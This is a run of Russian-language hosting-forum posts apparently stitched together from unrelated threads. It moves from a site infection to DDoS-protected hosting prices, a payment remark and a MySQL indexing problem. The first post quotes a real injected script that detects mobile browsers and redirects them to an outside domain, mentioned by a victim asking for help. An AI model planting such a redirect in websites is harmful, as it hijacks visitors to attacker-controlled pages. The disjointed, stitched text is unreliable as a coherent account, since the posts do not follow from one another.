Тоже столкнулся с вот таким кодом на сайте:
<script type="text/javascript"><br><!--if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location="http://mobileworld.pm/l6/?sub_id=3349&dd_id=0"; } //-- </script>
Кстати у меня последний раз появился 6го мая.
Не могу понять откуда берется, раньше еще и в .htaccess мобильный редирект дописывался, но в него он писался при помощи пхп скрипта, как оказалось.
На хостинге тоже стоит ISP панель, в самом сайте дырок нету, совсем мало кода самописного и пролезть негде, но в аккаунте еще есть пару малопосещаемых сайтов на вордпресе и опенкарте, их вирус или не трогает или трогает частично. А вот посещаемый ресурс заражает обязательно.
Скажите, пожалуйста, мне в личку где вы хоститесь.
ЗЫ: вариант угона FTP практически исключен, так как после последнего заражения, все вычистил и пароли поменял, а спустя две недели вирус снова появился, хоть паролями я и не пользовался больше.
Мастеркардом оплатить с недавнего времени нельзя, попробуйте визой.
Тьфу тьфу тьфу, надеюсь что нет)))
там речь о гривнах, сейчас сайт и так на выделеном серваке, мне бы надежный щит...
А если 2500 бюджет, то какие есть варианты? И в случае отсутствия ддоса все равно будет стоить 2500 грн?
Сейчас вынес сайт на отдельный сервак, нормально пока держится, когда замерял, было примерно 10 GET запросов страницы в секкунду.
Хм, не думал я что это стоит столько, возможно я сложил излишне большое впечатление о сайте который есть и о хостинге который хочу, хм.
Есть один сайт, сам по себе он очень легковесный(несколько десятков страниц), много не требует, толп людей там тоже не бывает, ну около пару тысяч уников в сутки. Вот это главное, большинство страниц даже без базы данных работает. Тоесть сайт много не жрет, мог бы вполне жить среди других сайтов за общей стеной хостера. Вот и хотелось бы такой хостинг который при атаке не будет отмалчиватся.
Сейчас же есть хостинг, от которого все что я услышал так это что идет ддос атака и включат тогда когда кончится, на вопрос о подробностях молчат. Даже не могу оценить ее масштабы(может ее и нет вообще), может простой выделеный сервачек с ней бы справился, хм.
Насчет бюджета 250грн в месяц, зависит от того что предлагается.
Хочется услышать в первую очередь мнения людей которые уже общались с сапортами хостингов на такие темы, чтобы это был не хостинг однодневка, а уже бывалая компания с хорошими специалистами, в которой есть специалисты способные не просто смотреть сложа руки на атаку но и будут чтото делать.
Причина нашлась, в этот раз нашелся UPDATE к таблице без индекса, а так в прошлый раз запрос show processlist мне бы помог разобратся.
Там, несколько разных записей появляется переодически, согласно них запросы выполняются быстро, там ничего не задерживается. В лог медленных запросов почемуто ничего не пишется, скорее всего потому что таких запросов нету. Я подозреваю что MySql перестраивает индексы или чтото там себе служебное делает, а после перезагрузки продолжает это делать. Вот знать бы как это остановить.
